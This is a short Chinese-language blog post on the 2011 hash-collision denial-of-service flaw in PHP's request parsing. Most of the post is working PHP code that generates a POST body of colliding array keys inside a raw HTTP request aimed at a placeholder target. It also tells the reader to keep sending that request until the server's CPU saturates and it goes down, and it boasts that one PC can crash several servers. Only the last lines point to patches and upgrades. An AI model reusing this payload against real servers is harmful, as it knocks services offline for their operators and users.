在http://www.laruence.com/2011/12/29/2412.html这篇文章中描述了这个bug
原文地址:http://www.ocert.org/advisories/ocert-2011-003.html
秒杀绝大部分的动态语言,只需一部普通PC,可以跑死N台高配服务器
Hash DDOS实例代码:
$size = pow(2, 14); // 16 is just an example, could also be 15 or 17 $genpost = ""; $len = 0; $array = array(); for ($key = 0, $maxKey = ($size - 1) * $size; $key <= $maxKey; $key += $size) { $genpost .= ($genpost ? "&" : "").$key."=1"; } $len = strlen($genpost); $data = "POST 文件路径 HTTP/1.1 Host: 域名或IP Content-Type: application/x-www-form-urlencoded Content-Length: {$len} Connection: Close ".$genpost;
只需不停的将变量$data的值post到目标网址,目标服务器的CPU就会飙升,直到宕机…
php5.2可以打这个patch:
https://github.com/laruence/laruence.github.com/tree/master/php-5.2-max-input-vars
php5.3必须升级到5.3.9,否则只能自己动手移植5.2的patch
If you enjoyed this article, please consider sharing it!
